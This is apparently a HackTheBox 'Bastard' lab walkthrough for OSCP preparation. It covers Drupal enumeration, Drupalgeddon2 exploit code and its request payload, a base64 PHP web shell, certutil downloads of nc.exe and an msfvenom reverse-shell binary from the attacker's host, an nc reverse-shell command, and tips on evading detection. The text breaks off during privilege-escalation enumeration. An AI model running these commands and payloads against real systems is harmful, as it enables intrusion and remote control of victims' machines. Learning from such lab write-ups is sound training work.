Spread the love

Table of Contents

Target:

Greetings, in the last post in my OSCP preparation series we covered SolidState. Today we will be tackling Bastard, a medium difficulty Windows machine created by the HackTheBox user ch4p.

In this writeup we will examine how to achieve an initial foothold by exploiting Drupal, two methods of using RCE to gain a reverse shell, and how to elevate privileges by abusing a vulnerable Windows feature.

Let’s get started!

Reconnaissance

We’ll kick things off by running an initial Nmap scan on the target:

sudo nmap -T4 -sV -sC -oA bastard_sudoNMAP_sV_sC_scan01 10.10.10.9

  • -T4 Sets the timing template of our scan to be fairly quick
  • -sC Will run a default script scan against the target with NSE (Nmap Scripting Engine)
  • -sV Will probe open ports to determine service/version info
  • -oA Will output our scan report in normal, XML, or Grepable format

Nmap scan report for 10.10.10.9
Host is up (0.054s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

With our Nmap scan completed, our report details that remote procedure call is present, as well as a Microsoft IIS web server running on TCP port 80 with Drupal installed.

Now, some of you hackers reading this may have alarm bells going off in your head right now and so did I when first discovering Drupal on this host.

Drupal is an open-source web content management framework written in PHP.

For those who may be unaware, Drupal is victim to a series of notorious vulnerabilities known as ‘Drupalgeddon’.

Let’s attempt to identify if our target may be susceptible to ‘Drupalgeddon’.

Firstly, we will query ExploitDB using searchsploit:

searchsploit Drupal 7

Great, searchsploit reports that there are numerous exploits for ‘Drupalgeddon’ available. However, given that our previous Nmap scan did not retrieve the exact version of Drupal 7 running on our target host, we will need to dig deeper to identify the specific version information.

Luckily there are some wonderful tools available that can aid with this. Two of the best enumeration tools I have found for Drupal are ‘droopescan’ and ‘Drupwn’. We can use these tools to acquire the version information from the target system. It should be noted that ‘droopescan’ can take quite awhile to run, but is a great tool all the same.

Let’s fire up some scans and see what comes back!

Drupwn

python3 drupwn –users –nodes –thread 20 –mode enum –target http://10.10.10.9 | tee drupwn_U_N_enum01

[-] Version not specified, trying to identify it

[+] Version detected: 7.54

============ Users ============

[+] ***** (id=1)
[+] ***** (id=6)
[+] ***** (id=5)

============ Nodes ============

http://10.10.10.9/node/1

droopescan

droopescan scan drupal -u http://10.10.10.9/ | tee droopescan_results01

[+] Plugins found:
ctools http://10.10.10.9/sites/all/modules/ctools/
http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.txt
http://10.10.10.9/sites/all/modules/ctools/changelog.txt
http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.TXT
http://10.10.10.9/sites/all/modules/ctools/LICENSE.txt
http://10.10.10.9/sites/all/modules/ctools/API.txt
libraries http://10.10.10.9/sites/all/modules/libraries/
http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.txt
http://10.10.10.9/sites/all/modules/libraries/changelog.txt
http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.TXT
http://10.10.10.9/sites/all/modules/libraries/README.txt
http://10.10.10.9/sites/all/modules/libraries/readme.txt
http://10.10.10.9/sites/all/modules/libraries/README.TXT
http://10.10.10.9/sites/all/modules/libraries/LICENSE.txt
services http://10.10.10.9/sites/all/modules/services/
http://10.10.10.9/sites/all/modules/services/README.txt
http://10.10.10.9/sites/all/modules/services/readme.txt
http://10.10.10.9/sites/all/modules/services/README.TXT
http://10.10.10.9/sites/all/modules/services/LICENSE.txt
image http://10.10.10.9/modules/image/
profile http://10.10.10.9/modules/profile/
php http://10.10.10.9/modules/php/

[+] Themes found:
seven http://10.10.10.9/themes/seven/
garland http://10.10.10.9/themes/garland/

[+] Possible version(s):
7.54

[+] Possible interesting urls found:
Default changelog file – http://10.10.10.9/CHANGELOG.txt
Default admin – http://10.10.10.9/user/login

[+] Scan finished (0:46:54.200528 elapsed)

Excellent, our scans promptly return the version information of the Drupal installation:

In addition to these scans, performing file and directory enumeration against the target can also be leveraged to locate the version information manually. For example, OWASP ZAP reports that the file ‘CHANGELOG.txt’ is present on the web server:

It is always a good idea to investigate log files when targeting a web server or application, as these tend to contain rich amounts of information that can be of aid in the attack process.

http://10.10.10.9/changelog.txt

Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition:
  https://www.drupal.org/node/2826480).
- Logging of searches can now be disabled (new option in the administrative
  interface).
- Added menu tree render structure to (pre-)process hooks for theme_menu_tree()
  (API addition: https://www.drupal.org/node/2827134).
- Added new function for determining whether an HTTPS request is being served
  (API addition: https://www.drupal.org/node/2824590).
- Fixed incorrect default value for short and medium date formats on the date
  type configuration page.
- File validation error message is now removed after subsequent upload of valid
  file.
- Numerous bug fixes.
- Numerous API documentation improvements.
- Additional performance improvements.
- Additional automated test coverage.

In this context, investigating the ‘CHANGELOG.txt’ file on the web server will also confirm that the current version of the Drupal installation is 7.54.

Now that we are aware of the exact version of Drupal running on the target, we now have enough information to begin our exploitation process!

Exploitation

If we recall the results from our searchsploit query earlier, we’ll notice that there are a number of available exploits that we could utilize against the version of Drupal that we are targeting:

Since the OSCP exam greatly restricts the usage of the Metasploit Framework, we will not make use of Metasploit modules to exploit this vulnerability. While this may appear to be a nuisance to those of you who are currently in the process of preparing for your exam, I can personally guarantee that attacking targets without being over reliant on the Metasploit Framework will make you a better hacker!

With this in mind, it appears that the ‘Drupalgeddon2’ remote code execution exploit will be suitable for attacking our Drupal 7.54 installation:

Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 – ‘Drupalgeddon2’ Remote Code Execution | php/webapps/44449.rb

Before we fire off our exploit, let’s first analyze what conditions cause this vulnerability and how our exploit leverages this to achieve remote code execution.

Vulnerability and Exploit Analysis

This vulnerability was made public on March 28th, 2018 by the Drupal core security team in a security advisory titled SA-CORE-2018-002, which details a remote code execution vulnerability identified as CVE-2018-7600. This vulnerability exists in Drupal versions 7.x before 7.58, 8.3.x versions before 8.3.9, 8.4.x versions before 8.4.6, and 8.5.x before 8.5.1.

The vulnerability occurs due to insufficient user-supplied input sanitization in the Drupal Form API. The Form API was first introduced in Drupal 6, allowing for the alteration of data during the form rendering process. In Drupal 7, this API was expanded to include a new construct known as ‘Render Arrays’. In Drupal, render arrays are structured arrays that contain data and associated properties that determine how the data within an array should be rendered into HTML/Markup. These structured arrays are organized in a key-value pair format that can be passed as arguments to functions or form data in order to render UI elements. These property keys are prefixed by a ‘#’ character, as we can see in the example below:

$page = array(
  '#show_messages' => TRUE,
  '#theme' => 'page',
  '#type' => 'page',
  'content' => array(
    'system_main' => array(...),
    'another_block' => array(...),
    '#sorted' => TRUE,
  ),
  'sidebar_first' => array(
    ...
  ),
  'footer' => array(
    ...
  ),
  ...
);

Exploits targeting Drupalgeddon2 make use of these properties in render arrays through crafted HTTP and AJAX request to the Form API. These property values affect the resulting rendering process and can be used to achieve an AJAX response from the API which serves the rendered requested resource. The remote code execution vulnerability itself occurs due to improper sanitization when specific properties submitted within an HTTP/AJAX request are parsed by a function titled doRender() within the vulnerable code. Once these properties are parsed by the function, the attacker is able to access PHP callback functions that can be leveraged to gain code execution.

The properties that can be used to access callback functions when parsed by the doRender() function include:

  • #post_render
  • #pre_render
  • #access_callback
  • #lazy_builder

Examples of dangerous PHP callback functions that can be utilized to achieve code execution on the target include ‘exec’ and ‘passthru’.

Now that we have a general understanding of the vulnerability, let’s examine how our exploit gains code execution in Drupal 7.x as the version we are targeting falls within this category.

Firstly, we can modify our exploit code to tunnel through a proxy in order to aid in identifying what occurs when we launch our attack:

# Settings - Proxy information (nil to disable)
$proxy_addr = '127.0.0.1'
$proxy_port = 8080 

Starting on line 25, we’ll set $proxy_addr to our localhost and use Burp Suite to intercept the traffic.

Now that our proxy is configured, let’s determine how the exploit verifies what version of Drupal is present on the target:

# Try and get version
$drupalverion = ""

# Possible URLs
url = [
  # --- changelog ---
  # Drupal v6.x / v7.x [200]
  $target + "CHANGELOG.txt",
  # Drupal v8.x [200]
  $target + "core/CHANGELOG.txt",

  # --- bootstrap ---
  # Drupal v7.x / v6.x [403]
  $target + "includes/bootstrap.inc",
  # Drupal v8.x [403]
  $target + "core/includes/bootstrap.inc",

  # --- database ---
  # Drupal v7.x / v6.x  [403]
  $target + "includes/database.inc",
  # Drupal v7.x [403]
  #$target + "includes/database/database.inc",
  # Drupal v8.x [403]
  #$target + "core/includes/database.inc",

  # --- landing page ---
  # Drupal v8.x / v7.x [200]
  $target,
]
 

In the code shown above, we can see that the exploit identifies the Drupal version by examining the ‘CHANGELOG.txt’ file, ‘includes/bootsrap.inc’ file, or the ‘includes/database.inc’ file.

HTTP Request within Burp Suite

Once the version has been confirmed, the exploit will continue by sending additional HTTP request to identify if the URI of a vulnerable form is present. In versions of Drupal 7, this URI is /user/password.

In addition to this, the exploit will also attempt to confirm if the target is configured with RESTful style URLs or not:

# The attack vector to use
$form = $drupalverion.start_with?("8")? "user/register" : "user/password"

# Make a request, check for form
url = "#{$target}?q=#{$form}"
puts action("Testing: Form   (#{$form})")
response = http_request(url, 'get', '', $session_cookie)
if response.code == "200" and not response.body.empty?
  puts success("Result : Form valid")
elsif response['location']
  puts error("Target is NOT exploitable [5] (HTTP Response: #{response.code})...   Could try following the redirect: #{response['location']}")
  exit
elsif response.code == "404"
  puts error("Target is NOT exploitable [4] (HTTP Response: #{response.code})...   Form disabled?")
  exit
elsif response.code == "403"
  puts error("Target is NOT exploitable [3] (HTTP Response: #{response.code})...   Form blocked?")
  exit
elsif response.body.empty?
  puts error("Target is NOT exploitable [2] (HTTP Response: #{response.code})...   Got an empty response")
  exit
else
  puts warning("WARNING: Target may NOT exploitable [1] (HTTP Response: #{response.code})")
end


puts "- "*40
 

Moving on, the exploit will attempt to test for code execution by sending an HTTP POST request to the target containing a vulnerable rendering element in the payload. In Drupal 7, this vulnerable element is ‘name‘. The exploit generates a random string and attempts to have the target echo this string. If this string is returned, then code execution is confirmed.

# Values in gen_evil_url for Drupal v7.x
elementsv7 = [
  "name",
]

elements = $drupalverion.start_with?("8") ? elementsv8 : elementsv7

elements.each do|e|
  $element = e

  # Make a request, testing code execution
  puts action("Testing: Code Execution   (Method: #{$element})")

  # Generate a random string to see if we can echo it
  random = (0...8).map { (65 + rand(26)).chr }.join
  url, payload = gen_evil_url("echo #{random}", e)
 

Once the exploit test for code execution, it will attempt to send additional HTTP request. First to check if a PHP web shell is present on the host, if not it will then attempt to write one to the target:

# Location of web shell & used to signal if using PHP shell
webshellpath = ""
prompt = "drupalgeddon2"

# Possibles paths to try
paths = [
  # Web root
  "",
  # Required for setup
  "sites/default/",
  "sites/default/files/",
  # They did something "wrong", chmod -R 0777 .
  #"core/",
]
# Check all (if doing web shell)
paths.each do|path|
  # Check to see if there is already a file there
  puts action("Testing: Existing file   (#{$target}#{path}#{webshell})")

  response = http_request("#{$target}#{path}#{webshell}", 'get', '', $session_cookie)
  if response.code == "200"
    puts warning("Response: HTTP #{response.code} // Size: #{response.size}.   ***Something could already be there?***")
  else
    puts info("Response: HTTP #{response.code} // Size: #{response.size}")
  end

  puts "- "*40 
dg_attempt_to_write_shell

Lastly, if a shell is unable to be written to the target host, the exploit will serve us an interface that can be utilized to submit further payloads to the target. This allows us to input OS commands to the exploit which will submit them to the target hosts via additional HTTP requests.

Let’s look at an example of that now:

HTTP Requests:

As we can see in the HTTP request above, the exploit sends POST data to the vulnerable form URI:

/?q=user/password

The vulnerable rendering element ‘name’ is also included:

/?q=user/password&name

The rendering element is passed the ‘#post_render’ property as a parameter argument. Allowing for access to the PHP callback function ‘passthru’:

/?q=user/password&name[%23post_render][]=passthru

The rendering element is then passed the ‘#type’ property to declare that the type of the form element is Markup:

/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup

Lastly, our arbitrary command is appended, allowing for it to be executed by the ‘passthru’ function:

/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=whoami

Achieving Remote Code Execution

Now that we have a good understanding of how our exploit operates, let’s use it to gain code execution!

ruby drupalgeddonn2 http://10.10.10.9/ | tee dg_run01

[*] –==[::#Drupalggedon2::]==–
——————————————————————————–
[i] Target : http://10.10.10.9/
[i] Proxy : 127.0.0.1:8080
——————————————————————————–
[+] Found : http://10.10.10.9/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.54
——————————————————————————–
[*] Testing: Form (user/password)
[+] Result : Form valid
– – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – –
[*] Testing: Clean URLs
[+] Result : Clean URLs enabled
——————————————————————————–
[*] Testing: Code Execution (Method: name)
[i] Payload: echo ZGQGYTHT
[+] Result : ZGQGYTHT
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
——————————————————————————–
[*] Testing: Existing file (http://10.10.10.9/shell.php)
[i] Response: HTTP 404 // Size: 12
– – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – –
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)… Might not have write access?
– – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – –
[*] Testing: Existing file (http://10.10.10.9/sites/default/shell.php)
[i] Response: HTTP 404 // Size: 12
– – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – –
[*] Testing: Writing To Web Root (sites/default/)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)… Might not have write access?
– – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – –
[*] Testing: Existing file (http://10.10.10.9/sites/default/files/shell.php)
[i] Response: HTTP 404 // Size: 12
– – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – –
[*] Testing: Writing To Web Root (sites/default/files/)
[*] Moving : ./sites/default/files/.htaccess
[i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)… Might not have write access?
[!] FAILED : Couldn’t find a writeable web path
——————————————————————————–
[*] Dropping back to direct OS commands
drupalgeddon2>> whoami
nt authority\iusr

Awesome! We now have remote code execution on the target machine!

However, it appears that we lack the ability to write a web shell to the system.

Let’s explore how we can leverage our code execution to gain a shell on the system.

RCE to Shell

In this section we will investigate two methods to accomplish this goal.

Firstly, I can say with confidence that you will most likely encounter this type of obstacle during both your OSCP exam and real-world engagements. Therefore, it would be wise to become acquainted with how to overcome this hurdle.

The techniques that we will employ can be used against numerous targets. Personally, I have found great success with these methods when attacking Windows systems and with a slight amount of alteration, they can be used against Linux systems as well.

Enough preamble, let’s jump into the first approach!

Method 0x01: Netcat Binary Transfer

Our first method entails transferring ‘nc.exe‘ to the target system, which can then be utilized to achieve a reverse shell.

Within Kali Linux, there are numerous Windows tools and binaries included by default. These can be found within the following directory:

/usr/share/windows-resources/

Our ‘nc.exe‘ file, along with many other helpful binaries, can be located in this aptly named sub-directory:

/usr/share/windows-resources/binaries/

To begin transferring this file to our target, we’ll go ahead and fire up a simple web server from within this directory that can host our binary:

python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 …

Now that our file is ready to be served, we will switch back over to our exploit. From here, we can make use of our code execution to download the netcat executable from our attacking machine and write it to the victim machine:

drupalgeddon2>> certutil.exe -urlcache -split -f “http://10.10.14.52:8000/nc.exe” nc.exe

Excellent, our binary has now been stored on the target system.

Note that using ‘certutil.exe‘ in this manner is a great way to perform file transfers when working with Windows systems. In future posts, we will discuss Windows file transfer methods in length.

For now, let’s continue by opening up a listener on our local machine to catch our reverse shell:

sudo rlwrap nc -nlvp 443

With our listener ready, we will return to our exploit once more to send a reverse shell using the netcat executable:

drupalgeddon2>> nc.exe -e C:\Windows\System32\cmd.exe 10.10.14.52 443

Method 0x02: MSFVenom Malicious Binary

In our second approach, we can utilize MSFVenom to generate an executable that will send us a reverse shell when ran.

Note that MSFVenom is one of the few aspects of the Metasploit Framework that is not restricted on the exam and you should become very familiar with it.

To start, we can utilize our command execution to obtain detailed information about the system to aid in our payload creation:

drupalgeddon2>> systeminfo

Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46 ��
System Boot Time: 25/5/2020, 2:29:25 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC

We will continue by invoking the MSFVenom command and configuring it to create a payload that is suited for our target system:

msfvenom –platform Windows -p windows/x64/shell_reverse_tcp LHOST=10.10.14.52 LPORT=443 -e x64/xor_dynamic -a x64 -f exe > shelly.exe

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor_dynamic
x64/xor_dynamic succeeded with size 510 (iteration=0)
x64/xor_dynamic chosen with final size 510
Payload size: 510 bytes
Final size of exe file: 7168 bytes

  • –platform Declares the target platform the payload will be crafted for
  • -p Specifies the payload to be used
  • LHOST/LPORT Instructs the payload to connect back to the specified attacking host IP and port
  • -e Configures the payload to be encoded with an encoder of our choosing
  • -a Sets the architecture of the target system
  • -f Declares what format the payload should be crafted for

Here’s a little tip that may come in handy when working with binary files. UPX is a tool that can be utilized to compress binaries. Personally, I tend to habitually compress binary files before attempting a file transfer. Shrinking binary files before transferring them to a target system has a couple of advantages. The main advantage being that it can aid in keeping a low-profile when you have access to a system.

Given that binary files can often be quite large, transferring these files across a network or writing them to a system’s drive, can potentially attract attention. This may be due to vigilant network/system administrators or because of monitoring and security systems.

While this does not often pose a great threat to being detected, its a good practice to reduce your footprint and the noise you generate whenever possible.

Now that we have crafted a malicious executable, we will need to transfer it to the machine. We’ll achieve this through the use of ‘certutil.exe‘, as with the previous method.

We’ll begin by spinning up our HTTP server once more:

python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 …

Next, we will return to our exploit to download the file from our local system and place it on the remote host:

drupalgeddon2>> certutil.exe -urlcache -split -f “http://10.10.14.52:8000/shelly.exe” shelly.exe

With our executable placed on the target system, we’ll continue by opening up a listener on our local system:

sudo rlwrap nc -nlvp 443

Finally, we will utilize our command execution to run the malicious executable and receive a reverse shell:

drupalgeddon2>> shelly.exe

Given that we now have access to a fully functional shell, let’s grab the user.txt flag!

C:\inetpub\drupal-7.54>dir C:\Users
dir C:\Users
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA

Directory of C:\Users

19/03/2017 08:35 �� <DIR> .
19/03/2017 08:35 �� <DIR> ..
19/03/2017 02:20 �� <DIR> Administrator
19/03/2017 02:54 �� <DIR> Classic .NET AppPool
19/03/2017 08:35 �� <DIR> dimitris
14/07/2009 07:57 �� <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 30.807.928.832 bytes free

C:\inetpub\drupal-7.54>cd C:\Users\dimitris\Desktop
cd C:\Users\dimitris\Desktop

C:\Users\dimitris\Desktop>type user.txt

Privilege Escalation

So far, we have achieved remote command execution on the target, leveraged this to gain a shell, and collected our user flag. Now, we will attempt to escalate our privileges, let’s begin.

To start, we’ll transfer over some nifty enumeration scripts to our target in order to aid with our enumeration process.

Here are several that are great for Windows systems:

Powerless

https://github.com/M4ximuss/Powerless

Windows Privilege Escalation Awesome Scripts (WinPEAS)

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

WindowsEnum

https://github.com/absolomb/WindowsEnum

After selecting an enumeration script, we’ll go ahead and transfer it to the target. We can make use of the ‘certutil.exe’ method mentioned earlier, or we can utilize the ‘nc.exe’ binary to perform the file transfer.

Once our script is placed on the remote host, we can use our script(s) in conjunction with manual enumeration to acquire as much information as possible about the target system.

An essential enumeration method when targeting Windows systems is to invoke the ‘systeminfo‘ command. This will allow us to obtain detailed information about the host we are targeting:

C:\> systeminfo

systeminfo

Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46 ��
System Boot Time: 25/5/2020, 2:29:25 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.570 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.595 MB
Virtual Memory: In Use: 500 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9

Once we have acquired this information, we can feed the output into a handy tool known as ‘windows-exploit-suggester.py’. This tool will compare the patch level of our target system against the Microsoft vulnerability database to detect potential missing patches.

However, be aware that this tool is now currently outdated. While it is still effective against older versions of Windows, it is not advised to use this against more modern versions of the operating system.

To combat this, we can use an updated version of this tool which was inspired by the original titled Windows Exploit Suggester Next Generation (WES-NG). The updated version essentially functions in the same manner as the original and will return a list of potential vulnerabilities based on the system information of our target.

In this context, the original tool will still be effective since our remote host is running Windows Server 2008 R2. Despite which tool you utilize, we will still be able to obtain a broad list of vulnerabilities that we may be able to leverage for privilege escalation.

Both of the tools mentioned can be found at the following links:

Windows Exploit Suggester (Original)

https://github.com/SecWiki/windows-kernel-exploits/tree/master/win-exp-suggester

WES-NG

https://github.com/bitsadmin/wesng

Let’s go ahead and test that out!

WES-NG Output

python wes.py bastard_sysinfo.txt | tee bastard_vulns_wesng.txt

Windows Exploit Suggester 0.98 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
– Name: Windows Server 2008 R2 for x64-based Systems
– Generation: 2008 R2
– Build: 7600
– Version: None
– Architecture: x64-based
– Installed hotfixes: None
[+] Loading definitions
– Creation date of definitions: 20200504
[+] Determining missing patches
[+] Filtering duplicate vulnerabilities
[+] Found vulnerabilities

Date: 20110712
CVE: CVE-2011-1282
KB: KB2507938
Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110712
CVE: CVE-2011-1283
KB: KB2507938
Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110712
CVE: CVE-2011-1281
KB: KB2507938
Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110712
CVE: CVE-2011-1285
KB: KB2507938
Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110412
CVE: CVE-2011-0657
KB: KB2509553
Title: Vulnerability in DNS Resolution Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20111213
CVE: CVE-2011-3406
KB: KB2621146
Title: Vulnerability in Active Directory Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Active Directory Lightweight Directory Services
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2011-3402
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2011-3402
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2011-3402
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20111213
CVE: CVE-2011-3408
KB: KB2620712
Title: Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110614
CVE: CVE-2011-1869
KB: KB2535512
Title: Vulnerabilities in Distributed File System Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20110614
CVE: CVE-2011-1894
KB: KB2544893
Title: Vulnerability in MHTML Could Allow Information Disclosure
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Information Disclosure
Exploit: n/a

Date: 20110913
CVE: CVE-2011-1984
KB: KB2571621
Title: Vulnerability in WINS Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0181
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0181
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0181
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0180
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0180
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0180
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20081111
CVE: CVE-2007-0099
KB: KB954430
Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 4.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0003
KB: KB2742598
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0003
KB: KB2756920
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110412
CVE: CVE-2010-4701
KB: KB2506212
